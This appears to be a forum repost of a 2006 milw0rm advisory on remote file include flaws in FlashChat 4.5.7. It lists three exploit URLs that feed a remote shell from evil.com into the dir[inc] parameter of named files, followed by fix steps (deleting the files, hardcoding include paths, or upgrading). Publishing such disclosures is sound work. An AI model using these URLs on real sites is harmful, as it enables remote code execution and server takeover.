banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits FlashChat <= 4.5.7 Remote File Include Vulnerability  XML
  [Announcement]   FlashChat = 4.5.7 Remote File Include Vulnerability 07/09/2006 04:09:54 (+0700) | #1 | 21224
[Avatar]
anh_that_tinh
Elite Member

[Minus]    0    [Plus]
Joined: 10/05/2003 04:42:24
Messages: 30
Offline
[Profile] [PM] [Yahoo!]
Code:
NeXtMaN <mc.nadz [at] gmail.com>

Here are 3 RFI vulnerabilities in Flashchat i've found:

Code:
 http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
 http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
 http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

video here:

Code:
 http://rapidshare.de/files/31362430/Flashchat.rar.html


EDIT: Solution:


It looks like the vulnerable files are there in case you want to integrate with another script. The script that would require these files is AEDating:

you simply delete the following files and you will be secure:

/inc/cmses/aedating4CMS.php
/inc/cmses/aedatingCMS.php
/inc/cmses/aedatingCMS2.php

if your flashchat is integrated with AEDating and/or you dont want to delete the files you can just edit the 3 files to use your path like this:

Replace this:

$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]admin.inc.php" );

With this:

$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "[Your AED path]/db.inc.php" );
require_once( "[Your AED path]/admin.inc.php" );

Alternatively you could just upgrade to 4.6.2 (just released)

PS, all 3 of those files are vulnerable and will need editing.

# milw0rm.com [2006-09-04]
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|